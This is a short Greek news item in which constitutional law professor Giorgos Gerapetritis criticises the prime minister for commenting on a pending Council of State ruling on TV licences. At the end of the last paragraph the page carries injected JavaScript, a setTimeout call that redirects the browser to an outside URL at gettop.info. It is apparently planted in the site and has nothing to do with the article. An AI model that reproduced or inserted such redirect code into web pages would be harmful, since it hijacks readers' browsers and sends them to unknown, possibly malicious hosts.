«Άκομψο θεσμικά και άκαιρο πολιτικά το σχόλιο για το ΣτΕ»

0
10

 

Άκομψο θεσμικά και άκαιρο πολιτικά το οποιοδήποτε σχόλιο πολιτικού προσώπου σχετικά με επικείμενη απόφαση του ΣτΕ, δήλωσε στον ΣΚΑΙ ο Γιώργος Γιεραπετρίτης, αναπληρωτής καθηγητής συνταγματικού δικαίου στη νομική σχολή του Πανεπιστημίου Αθηνών.

Ο κ Γιεραπετρίτης, με αφορμή την τοποθέτηση του πρωθυπουργού στη συνέντευξη Τύπου της Διεθνούς Έκθεσης Θεσσαλονίκης, που εκτίμησε ότι το ΣτΕ δε θα κρίνει αντισυνταγματικό το νόμο Παππά για τις τηλεοπτικές άδειες, τόνισε ότι τα πολιτικά πρόσωπα πρέπει να απέχουν από οποιαδήποτε τέτοιου είδους σχόλια.

Μάλιστα σχολιάζοντας τη δήλωση του πρωθυπουργού έκανε λόγο για σοβαρό ζήτημα διακύβευσης της δίκαιης δίκης, δηλώνοντας πάντως ότι τα μέλη του ΣτΕ ειναι εξ’ ορισμού μέλη με υψηλό επίπεδο ευθυκρισίας που δεν επηρεάζονται.

Ο τρόπος που διαχειρίζεται η πολιτική εξουσία τη δικαιοσύνη είναι επικίνδυνος, τέτοιου είδους προσπάθειες χειραγώγησης βλάπτουν, εκτίμησε ο κ Γιεραπετρίτης και πρόσθεσε ότι η δικαιοσύνη οφείλει να είναι απέναντι στην πολιτική εξουσία και όχι συνέταιρός της. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here